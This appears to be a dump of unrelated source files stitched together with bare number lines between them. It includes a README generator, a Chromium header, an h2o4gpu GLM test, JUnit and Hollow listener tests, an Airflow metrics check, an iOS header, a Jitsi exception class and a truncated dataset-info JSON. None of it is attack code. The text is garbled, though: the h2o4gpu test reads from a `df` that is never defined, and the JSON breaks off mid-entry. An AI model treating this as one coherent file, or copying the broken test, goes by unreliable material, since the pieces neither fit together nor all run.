<reponame>huihui7987/blind_watermark<gh_stars>1000+ # 不想用 Sphinx,也不像弄一堆静态html文件,所以自己写个咯 ''' 需要从readme中解析出: 1. "-> Demo code: [examples/demo_pso.py](examples/demo_pso.py)" 2. 三个```python为开头,三个 ``` 为结尾 3. 从py文件中读出文本,并替换 4. 前几行是求star,只在readme中出现 需要从py文件中解析出: 1. # %% 做断点后赋予index值,然后插入readme ''' import os import sys import re def search_code(py_file_name, section_idx): ''' 给定py文件名和section序号,返回一个list,内容是py文件中的code(markdown格式) :param py_file_name: :param section_idx: :return: ''' with open('../' + py_file_name, encoding='utf-8', mode="r") as f: content = f.readlines() content_new, i, search_idx, idx_first_match = [], 0, 0, None while i < len(content) and search_idx <= section_idx: if content[i].startswith('# %%'): search_idx += 1 i += 1 # 带井号百分号的那一行也跳过去,不要放到文档里面 if search_idx < section_idx: pass elif search_idx == section_idx: idx_first_match = idx_first_match or i # record first match line content_new.append(content[i]) i += 1 return [ '-> Demo code: [{py_file_name}#s{section_idx}](https://github.com/guofei9987/blind_watermark/blob/master/{py_file_name}#L{idx_first_match})\n'. format(py_file_name=py_file_name, section_idx=section_idx + 1, idx_first_match=idx_first_match), '```python\n'] \ + content_new \ + ['```\n'] # %% def make_doc(origin_file): with open(origin_file, encoding='utf-8', mode="r") as f_readme: readme = f_readme.readlines() regex = re.compile('\[examples/[\w#.]+\]') readme_idx = 0 readme_new = [] while readme_idx < len(readme): readme_line = readme[readme_idx] if readme_line.startswith('-> Demo code: ['): # 找到中括号里面的内容,解析为文件名,section号 py_file_name, section_idx = regex.findall(readme[readme_idx])[0][1:-1].split('#s') section_idx = int(section_idx) - 1 print('插入代码: ', py_file_name, section_idx) content_new = search_code(py_file_name, section_idx) readme_new.extend(content_new) # 往下寻找第一个代码结束位置 while readme[readme_idx] != '```\n': readme_idx += 1 else: # 如果不需要插入代码,就用原本的内容 readme_new.append(readme_line) readme_idx += 1 return readme_new # 主页 README 和 en/README readme_new = make_doc(origin_file='../README.md') with open('../README.md', encoding='utf-8', mode="w") as f_readme: f_readme.writelines(readme_new) with open('en/README.md', encoding='utf-8', mode="w") as f_readme_en: f_readme_en.writelines(readme_new[20:]) # 跟目录的 README_cn.md 和 zh/README.md readme_zh = make_doc(origin_file='../README_cn.md') with open('../README_cn.md', encoding='utf-8', mode="w") as f_readme: f_readme.writelines(readme_zh) with open('zh/README.md', encoding='utf-8', mode="w") as f_readme_en: f_readme_en.writelines(readme_zh) # docs = ['zh/README.md','en/README.md' # ] # for i in docs: # docs_new = make_doc(origin_file=i) # with open(i, encoding='utf-8', mode="w") as f: # f.writelines(docs_new) # sys.exit()
1,925
575
// Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_ #define THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_ #include <memory> #include "third_party/blink/renderer/platform/graphics/compositing/layers_as_json.h" #include "third_party/blink/renderer/platform/platform_export.h" namespace blink { class GraphicsLayer; class JSONObject; PLATFORM_EXPORT std::unique_ptr<JSONObject> GraphicsLayerTreeAsJSON( const GraphicsLayer*, LayerTreeFlags); PLATFORM_EXPORT String GraphicsLayerTreeAsTextForTesting(const GraphicsLayer*, LayerTreeFlags); } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_
380
458
<filename>tests/python/open_data/glm/test_ridge.py import time import sys import os import numpy as np import pandas as pd import logging print(sys.path) from h2o4gpu.util.testing_utils import find_file, run_glm logging.basicConfig(level=logging.DEBUG) def fun(nGPUs=1, nFolds=1, nLambdas=100, nAlphas=8, validFraction=0.2): name = str(sys._getframe().f_code.co_name) name = sys._getframe(1).f_code.co_name t = time.time() print("cwd: %s" % (os.getcwd())) sys.stdout.flush() print("Reading Data") # df = pd.read_csv("./open_data/simple.txt", delim_whitespace=True) print(df.shape) X = np.array(df.iloc[:, :df.shape[1] - 1], dtype='float32', order='C') y = np.array(df.iloc[:, df.shape[1] - 1], dtype='float32', order='C') t1 = time.time() rmse_train, rmse_test = run_glm(X, y, nGPUs=nGPUs, nlambda=nLambdas, nfolds=nFolds, nalpha=nAlphas, validFraction=validFraction, verbose=0, name=name, solver="ridge") # check rmse print(rmse_train[0, 0]) print(rmse_train[0, 1]) print(rmse_train[0, 2]) print(rmse_test[0, 2]) sys.stdout.flush() if validFraction==0.0: assert rmse_train[0, 0] < 54000 assert rmse_train[0, 1] < 54000 assert rmse_train[0, 2] < 54000 assert rmse_test[0, 2] < 54000 else: if nLambdas>20: assert rmse_train[0, 0] < 50000 assert rmse_train[0, 1] < 50000 assert rmse_train[0, 2] < 50000 assert rmse_test[0, 2] < 50000 else: assert rmse_train[0, 0] < 59000 assert rmse_train[0, 1] < 59000 assert rmse_train[0, 2] < 59000 assert rmse_test[0, 2] < 59000 print('/n Total execution time:%d' % (time.time() - t1)) print("TEST PASSED") sys.stdout.flush() print("Time taken: {}".format(time.time() - t)) # endfunnel(pipes) print("DONE.") sys.stdout.flush() # for now don't test folds with simple because h2o-3 can't handle it # for small data sets altfold = 1 def test_glmridge_ipums_gpu_fold1_quick_0(): fun(nGPUs=1, nFolds=1, nLambdas=3, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold1_0(): fun(nGPUs=1, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold5_0(): fun(nGPUs=1, nFolds=altfold, nLambdas=20, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold1_quick(): fun(nGPUs=1, nFolds=1, nLambdas=5, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu_fold1(): fun(nGPUs=1, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu_fold5(): fun(nGPUs=1, nFolds=altfold, nLambdas=20, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu2_fold1_quick(): fun(nGPUs=2, nFolds=1, nLambdas=3, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu2_fold1(): fun(nGPUs=2, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0.2) if __name__ == '__main__': test_glmridge_ipums_gpu_fold1_quick_0() test_glmridge_ipums_gpu_fold1_0() test_glmridge_ipums_gpu_fold5_0() test_glmridge_ipums_gpu_fold1_quick() test_glmridge_ipums_gpu_fold1() test_glmridge_ipums_gpu_fold5() test_glmridge_ipums_gpu2_fold1_quick() test_glmridge_ipums_gpu2_fold1()
1,614
1,742
#from abstract_jacobian import is_Jacobian, Jacobian
16
318
<filename>surefire-providers/surefire-junit47/src/test/java/org/apache/maven/surefire/junitcore/DiagnosticRunListener.java<gh_stars>100-1000 package org.apache.maven.surefire.junitcore; /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * * Also licensed under CPL http://junit.sourceforge.net/cpl-v10.html */ import java.util.concurrent.atomic.AtomicInteger; import org.junit.runner.Description; import org.junit.runner.Result; import org.junit.runner.notification.Failure; import org.junit.runner.notification.RunListener; /** * @author <NAME>, kristianAzeniorD0Tno */ public class DiagnosticRunListener extends RunListener { private final AtomicInteger numTestStarted = new AtomicInteger(); private final AtomicInteger numTestFailed = new AtomicInteger(); private final AtomicInteger numTestAssumptionsFailed = new AtomicInteger(); private final AtomicInteger numTestFinished = new AtomicInteger(); private final AtomicInteger numTestIgnored = new AtomicInteger(); private final boolean printToConsole; private final RunListener target; private void print( String event, Description description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } private void print( String event, Result description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } private void print( String event, Failure description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } public DiagnosticRunListener( boolean printToConsole, RunListener target ) { this.printToConsole = printToConsole; this.target = target; } @Override public void testRunStarted( Description description ) throws Exception { print( "testRunStarted", description ); if ( target != null ) { target.testRunStarted( description ); } } @Override public void testRunFinished( Result result ) throws Exception { print( "testRunFinished", result ); if ( target != null ) { target.testRunFinished( result ); } } @Override public void testStarted( Description description ) throws Exception { numTestStarted.incrementAndGet(); print( "testStarted", description ); if ( target != null ) { target.testStarted( description ); } } @Override public void testFinished( Description description ) throws Exception { numTestFinished.incrementAndGet(); print( "testFinished", description ); if ( target != null ) { target.testFinished( description ); } } @Override public void testFailure( Failure failure ) throws Exception { numTestFailed.incrementAndGet(); print( "testFailure", failure ); if ( target != null ) { target.testFailure( failure ); } } @Override public void testAssumptionFailure( Failure failure ) { numTestAssumptionsFailed.incrementAndGet(); print( "testAssumptionFailure", failure ); if ( target != null ) { target.testAssumptionFailure( failure ); } } @Override public void testIgnored( Description description ) throws Exception { numTestIgnored.incrementAndGet(); print( "testIgnored", description ); if ( target != null ) { target.testIgnored( description ); } } @Override public String toString() { return "DiagnosticRunListener{" + "numTestIgnored=" + numTestIgnored + ", numTestStarted=" + numTestStarted + ", numTestFailed=" + numTestFailed + ", numTestAssumptionsFailed=" + numTestAssumptionsFailed + ", numTestFinished=" + numTestFinished + '}'; } }
2,036
1,103
/* * Copyright 2016-2019 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.netflix.hollow.api.consumer; import com.netflix.hollow.api.consumer.HollowConsumer.AbstractRefreshListener; import com.netflix.hollow.api.consumer.HollowConsumer.Blob; import com.netflix.hollow.api.consumer.HollowConsumer.ObjectLongevityConfig; import com.netflix.hollow.api.custom.HollowAPI; import com.netflix.hollow.api.objects.generic.GenericHollowObject; import com.netflix.hollow.api.producer.HollowProducer; import com.netflix.hollow.api.producer.HollowProducer.Populator; import com.netflix.hollow.api.producer.HollowProducer.WriteState; import com.netflix.hollow.api.producer.fs.HollowInMemoryBlobStager; import com.netflix.hollow.core.read.engine.HollowReadStateEngine; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.junit.Before; import org.junit.Test; public class HollowRefreshListenerTests { private InMemoryBlobStore blobStore; private RecordingRefreshListener listener; private HollowProducer producer; private HollowConsumer consumer; @Before public void setUp() { blobStore = new InMemoryBlobStore(); listener = new RecordingRefreshListener(); producer = HollowProducer.withPublisher(blobStore) .withBlobStager(new HollowInMemoryBlobStager()) .withNumStatesBetweenSnapshots(Integer.MAX_VALUE) .build(); consumer = HollowConsumer.withBlobRetriever(blobStore) .withRefreshListener(listener) .withObjectLongevityConfig(new ObjectLongevityConfig() { @Override public long usageDetectionPeriodMillis() { return 100L; } @Override public long gracePeriodMillis() { return 100L; } @Override public boolean forceDropData() { return false; } @Override public boolean enableLongLivedObjectSupport() { return true; } @Override public boolean enableExpiredUsageStackTraces() { return false; } @Override public boolean dropDataAutomatically() { return true; } }) .build(); } @Test public void testRemoveDuplicateRefreshListeners() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .withRefreshListener(listener) .withRefreshListener(listener) .build(); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, listener.cycles); listener.clear(); long v2 = runCycle(producer, 2); consumer.addRefreshListener(listener); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(1, listener.cycles); } @Test public void testCopyRefreshListeners() { List<HollowConsumer.RefreshListener> listeners = new ArrayList<>(); listeners.add(listener); HollowConsumer.Builder<?> b = new HollowConsumer.Builder() { @Override public HollowConsumer build() { return new HollowConsumer(blobRetriever, announcementWatcher, listeners, apiFactory, filterConfig, objectLongevityConfig, objectLongevityDetector, doubleSnapshotConfig, hashCodeFinder, refreshExecutor, memoryMode, metricsCollector); } }; HollowConsumer consumer = b.withBlobRetriever(blobStore).build(); long v1 = runCycle(producer, 1); listeners.clear(); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, listener.cycles); } @Test public void testMethodSemanticsOnInitialRefresh() { long v1 = runCycle(producer, 1); long v2 = runCycle(producer, 2); long v3 = runCycle(producer, 3); long v4 = runCycle(producer, 4); long v5 = runCycle(producer, 5); consumer.triggerRefreshTo(v5+1); /// update occurred semantics Assert.assertEquals(1, listener.snapshotUpdateOccurredVersions.size()); Assert.assertEquals(v5, listener.snapshotUpdateOccurredVersions.get(0).longValue()); Assert.assertTrue(listener.deltaUpdateOccurredVersions.isEmpty()); /// applied semantics Assert.assertEquals(1, listener.snapshotAppliedVersions.size()); Assert.assertEquals(v1, listener.snapshotAppliedVersions.get(0).longValue()); Assert.assertEquals(4, listener.deltaAppliedVersions.size()); Assert.assertEquals(v2, listener.deltaAppliedVersions.get(0).longValue()); Assert.assertEquals(v3, listener.deltaAppliedVersions.get(1).longValue()); Assert.assertEquals(v4, listener.deltaAppliedVersions.get(2).longValue()); Assert.assertEquals(v5, listener.deltaAppliedVersions.get(3).longValue()); /// blobs loaded semantics Assert.assertEquals(5, listener.blobsLoadedVersions.size()); Assert.assertEquals(v1, listener.blobsLoadedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.blobsLoadedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.blobsLoadedVersions.get(2).longValue()); Assert.assertEquals(v4, listener.blobsLoadedVersions.get(3).longValue()); Assert.assertEquals(v5, listener.blobsLoadedVersions.get(4).longValue()); Assert.assertEquals(Long.MIN_VALUE, listener.refreshStartCurrentVersion); Assert.assertEquals(v5+1, listener.refreshStartRequestedVersion); Assert.assertEquals(Long.MIN_VALUE, listener.refreshSuccessBeforeVersion); Assert.assertEquals(v5, listener.refreshSuccessAfterVersion); Assert.assertEquals(v5+1, listener.refreshSuccessRequestedVersion); } @Test public void testMethodSemanticsOnSubsequentRefreshes() { long v0 = runCycle(producer, 0); consumer.triggerRefreshTo(v0); listener.clear(); long v1 = runCycle(producer, 1); long v2 = runCycle(producer, 2); long v3 = runCycle(producer, 3); consumer.triggerRefreshTo(v3); /// update occurred semantics Assert.assertEquals(0, listener.snapshotUpdateOccurredVersions.size()); Assert.assertEquals(3, listener.deltaUpdateOccurredVersions.size()); Assert.assertEquals(v1, listener.deltaUpdateOccurredVersions.get(0).longValue()); Assert.assertEquals(v2, listener.deltaUpdateOccurredVersions.get(1).longValue()); Assert.assertEquals(v3, listener.deltaUpdateOccurredVersions.get(2).longValue()); /// applied semantics Assert.assertEquals(0, listener.snapshotAppliedVersions.size()); Assert.assertEquals(3, listener.deltaAppliedVersions.size()); Assert.assertEquals(v1, listener.deltaAppliedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.deltaAppliedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.deltaAppliedVersions.get(2).longValue()); /// blobs loaded semantics Assert.assertEquals(3, listener.blobsLoadedVersions.size()); Assert.assertEquals(v1, listener.blobsLoadedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.blobsLoadedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.blobsLoadedVersions.get(2).longValue()); Assert.assertEquals(v0, listener.refreshStartCurrentVersion); Assert.assertEquals(v3, listener.refreshStartRequestedVersion); Assert.assertEquals(v0, listener.refreshSuccessBeforeVersion); Assert.assertEquals(v3, listener.refreshSuccessAfterVersion); Assert.assertEquals(v3, listener.refreshSuccessRequestedVersion); } @Test public void testObjectLongevityOnInitialUpdateCallbacks() { runCycle(producer, 1); runCycle(producer, 2); runCycle(producer, 3); runCycle(producer, 4); long v5 = runCycle(producer, 5); final List<GenericHollowObject> snapshotOrdinal0Objects = new ArrayList<GenericHollowObject>(); final List<GenericHollowObject> deltaOrdinal0Objects = new ArrayList<GenericHollowObject>(); final List<GenericHollowObject> deltaOrdinal1Objects = new ArrayList<GenericHollowObject>(); HollowConsumer.RefreshListener longevityListener = new AbstractRefreshListener() { public void snapshotApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotOrdinal0Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 0)); } public void deltaApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaOrdinal0Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 0)); deltaOrdinal1Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 1)); } }; consumer.addRefreshListener(longevityListener); consumer.triggerRefreshTo(v5); Assert.assertEquals(1, snapshotOrdinal0Objects.get(0).getInt("value")); Assert.assertEquals(2, deltaOrdinal1Objects.get(0).getInt("value")); Assert.assertEquals(3, deltaOrdinal0Objects.get(1).getInt("value")); Assert.assertEquals(4, deltaOrdinal1Objects.get(2).getInt("value")); Assert.assertEquals(5, deltaOrdinal0Objects.get(3).getInt("value")); } @Test public void testAddListenerDuringRefresh() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .build(); class SecondRefreshListener extends AbstractRefreshListener { int refreshStarted; int refreshSuccessful; @Override public void refreshStarted(long currentVersion, long requestedVersion) { refreshStarted++; } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessful++; } }; class FirstRefreshListener extends SecondRefreshListener { SecondRefreshListener srl = new SecondRefreshListener(); @Override public void refreshStarted(long currentVersion, long requestedVersion) { super.refreshStarted(currentVersion, requestedVersion); // Add the second listener concurrently during a refresh consumer.addRefreshListener(srl); } }; FirstRefreshListener frl = new FirstRefreshListener(); consumer.addRefreshListener(frl); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, frl.refreshStarted); Assert.assertEquals(1, frl.refreshSuccessful); Assert.assertEquals(0, frl.srl.refreshStarted); Assert.assertEquals(0, frl.srl.refreshSuccessful); long v2 = runCycle(producer, 2); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(2, frl.refreshStarted); Assert.assertEquals(2, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); } @Test public void testRemoveListenerDuringRefresh() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .build(); class SecondRefreshListener extends AbstractRefreshListener { int refreshStarted; int refreshSuccessful; @Override public void refreshStarted(long currentVersion, long requestedVersion) { refreshStarted++; } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessful++; } }; class FirstRefreshListener extends SecondRefreshListener { SecondRefreshListener srl; FirstRefreshListener(SecondRefreshListener srl) { this.srl = srl; } @Override public void refreshStarted(long currentVersion, long requestedVersion) { super.refreshStarted(currentVersion, requestedVersion); // Remove the second listener concurrently during a refresh consumer.removeRefreshListener(srl); } }; SecondRefreshListener srl = new SecondRefreshListener(); FirstRefreshListener frl = new FirstRefreshListener(srl); consumer.addRefreshListener(frl); consumer.addRefreshListener(srl); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, frl.refreshStarted); Assert.assertEquals(1, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); long v2 = runCycle(producer, 2); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(2, frl.refreshStarted); Assert.assertEquals(2, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); } private long runCycle(HollowProducer producer, final int cycleNumber) { return producer.runCycle(new Populator() { public void populate(WriteState state) throws Exception { state.add(Integer.valueOf(cycleNumber)); } }); } private class RecordingRefreshListener extends AbstractRefreshListener { long cycles; long refreshStartCurrentVersion; long refreshStartRequestedVersion; long refreshSuccessBeforeVersion; long refreshSuccessAfterVersion; long refreshSuccessRequestedVersion; List<Long> snapshotUpdateOccurredVersions = new ArrayList<Long>(); List<Long> deltaUpdateOccurredVersions = new ArrayList<Long>(); List<Long> blobsLoadedVersions = new ArrayList<Long>(); List<Long> snapshotAppliedVersions = new ArrayList<Long>(); List<Long> deltaAppliedVersions = new ArrayList<Long>(); @Override public void refreshStarted(long currentVersion, long requestedVersion) { cycles++; this.refreshStartCurrentVersion = currentVersion; this.refreshStartRequestedVersion = requestedVersion; } @Override public void snapshotUpdateOccurred(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotUpdateOccurredVersions.add(version); } @Override public void deltaUpdateOccurred(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaUpdateOccurredVersions.add(version); } @Override public void blobLoaded(Blob transition) { blobsLoadedVersions.add(transition.getToVersion()); } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessBeforeVersion = beforeVersion; refreshSuccessAfterVersion = afterVersion; refreshSuccessRequestedVersion = requestedVersion; } @Override public void refreshFailed(long beforeVersion, long afterVersion, long requestedVersion, Throwable failureCause) { } @Override public void snapshotApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotAppliedVersions.add(version); } @Override public void deltaApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaAppliedVersions.add(version); } public void clear() { cycles = 0; snapshotUpdateOccurredVersions.clear(); deltaUpdateOccurredVersions.clear(); blobsLoadedVersions.clear(); snapshotAppliedVersions.clear(); deltaAppliedVersions.clear(); } } }
7,308
663
# (C) Datadog, Inc. 2010-2019 # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import re import pytest import requests # Make sure this expected metrics list is up to date with: # - `dogstatsd_mapper_profiles` configuration from README.md # - metadata.csv EXPECTED_METRICS = [ '<job_name>_start', '<job_name>_end', '<job_name>_heartbeat_failure', 'operator_failures_<operator_name>', 'operator_successes_<operator_name>', 'ti_failures', 'ti_successes', 'previously_succeeded', 'zombies_killed', 'scheduler_heartbeat', 'dag_processing.processes', 'dag_processing.manager_stalls', 'dag_file_refresh_error', 'scheduler.tasks.killed_externally', 'scheduler.orphaned_tasks.cleared', 'scheduler.orphaned_tasks.adopted', 'scheduler.critical_section_busy', 'sla_email_notification_failure', 'ti.start.<dagid>.<taskid>', 'ti.finish.<dagid>.<taskid>.<state>', 'dag.callback_exceptions', 'celery.task_timeout_error', 'task_removed_from_dag.<dagid>', 'task_restored_to_dag.<dagid>', 'task_instance_created-<operator_name>', 'dagbag_size', 'dag_processing.import_errors', 'dag_processing.total_parse_time', 'dag_processing.last_runtime.<dag_file>', 'dag_processing.last_run.seconds_ago.<dag_file>', 'dag_processing.processor_timeouts', 'scheduler.tasks.without_dagrun', 'scheduler.tasks.running', 'scheduler.tasks.starving', 'scheduler.tasks.executable', 'executor.open_slots', 'executor.queued_tasks', 'executor.running_tasks', 'pool.open_slots.<pool_name>', 'pool.queued_slots.<pool_name>', 'pool.running_slots.<pool_name>', 'pool.starving_tasks.<pool_name>', 'smart_sensor_operator.poked_tasks', 'smart_sensor_operator.poked_success', 'smart_sensor_operator.poked_exception', 'smart_sensor_operator.exception_failures', 'smart_sensor_operator.infra_failures', # 'pool.used_slots.<pool_name>' appears on https://airflow.apache.org/docs/1.10.11/metrics.html 'dagrun.dependency-check.<dag_id>', 'dag.<dag_id>.<task_id>.duration', 'dag_processing.last_duration.<dag_file>', 'dagrun.duration.success.<dag_id>', 'dagrun.duration.failed.<dag_id>', 'dagrun.schedule_delay.<dag_id>', 'scheduler.critical_section_duration', 'dagrun.<dag_id>.first_task_scheduling_delay', 'collect_db_dags', ] METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE) @pytest.mark.latest_metrics def test_check_metrics_up_to_date(): url = 'https://raw.githubusercontent.com/apache/airflow/master/docs/apache-airflow/logging-monitoring/metrics.rst' resp = requests.get(url) content = resp.content.decode('utf-8') matches = METRIC_PATTERN.findall(content) # Printed only on failure for convenience. print("Metric from {} :".format(url)) print("") for metric, desc in matches: print("{:50} {}".format(metric, desc)) metrics = [m for m, desc in matches] assert EXPECTED_METRICS == metrics
1,301
1,434
<filename>ios/Hera/Page/WDHUtils.h // // Copyright (c) 2017, <EMAIL> // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // #import <UIKit/UIKit.h> @interface WDHUtils : NSObject + (UIColor *)SMRGB:(unsigned int)rgbValue; + (UIColor *)SMRGBA:(unsigned int)rgbValue alpha:(float)alpha; //颜色转换如字符串#c60a1e -> UIColor + (UIColor *) WH_Color_Conversion:(NSString *)Color_Value; /** 获取文本大小 @param text 文本信息 @param font 字体类型 */ + (CGSize)getTextSize:(NSString *)text font:(UIFont *)font; /** 获取文本高度 @param text 文本信息 @param font 字体类型 @param width 字体宽度 */ + (CGFloat) getTextHeight:(NSString *)text font:(UIFont *)font width:(CGFloat)width; /** 获取文本高度 @param text 文本信息 @param font 字体类型 @param height 字体高度 */ + (CGFloat) getTextWidth:(NSString *)text font:(UIFont *)font height:(CGFloat)height; /** 压缩图片 */ + (UIImage *)imageWithImage:(UIImage *)image scaledToSize:(CGSize)newSize; /** 生产纯色图片 @param rect 图片大小 */ + (UIImage *)imageFromColor:(UIColor *)color rect:(CGRect)rect; @end
872
3,442
/* * Jitsi, the OpenSource Java VoIP and Instant Messaging client. * * Copyright @ 2015 Atlassian Pty Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package net.java.sip.communicator.impl.protocol.irc.exception; /** * Exception thrown in case an IRC command is used in the wrong way. * * @author <NAME> */ public class BadCommandInvocationException extends Exception { /** * Serialization id. */ private static final long serialVersionUID = 1L; /** * The original command line. */ private final String line; /** * The help text provided by the command. */ private final String help; /** * Constructor. * * @param line the original command line * @param help the help text provided by the command * @param cause the cause of the exception */ public BadCommandInvocationException(final String line, final String help, final Throwable cause) { super("The command failed because of incorrect usage: " + cause.getMessage(), cause); this.line = line; this.help = help; } /** * Get original command line. * * @return returns the original command line */ public String getLine() { return this.line; } /** * Get the help text provided by the command. * * @return returns command's help text */ public String getHelp() { return this.help; } }
667
412
int foo(int *x) { if(*x) { int y = 9; } else { int z = 4; } } int main() { int x; foo(&x); }
71
3,395
{"plain_text": {"description": "\nElkarHizketak is a low resource conversational Question Answering\n(QA) dataset in Basque created by Basque speaker volunteers. The\ndataset contains close to 400 dialogues and more than 1600 question\nand answers, and its small size presents a realistic low-resource\nscenario for conversational QA systems. The dataset is built on top of\nWikipedia sections about popular people and organizations. The\ndialogues involve two crowd workers: (1) a student ask questions after\nreading a small introduction about the person, but without seeing the\nsection text; and (2) a teacher answers the questions selecting a span\nof text of the section. ", "citation": "@inproceedings{otegi-etal-2020-conversational,\n title = \"{Conversational Question Answering in Low Resource Scenarios: A Dataset and Case Study for {B}asque}\",\n author = \"<NAME> and\n <NAME> and\n <NAME> and\n <NAME> and\n <NAME>\",\n booktitle = \"Proceedings of the 12th Language Resources and Evaluation Conference\",\n year = \"2020\",\n publisher = \"European Language Resources Association\",\n url = \"https://aclanthology.org/2020.lrec-1.55\",\n pages = \"436--442\",\n ISBN = 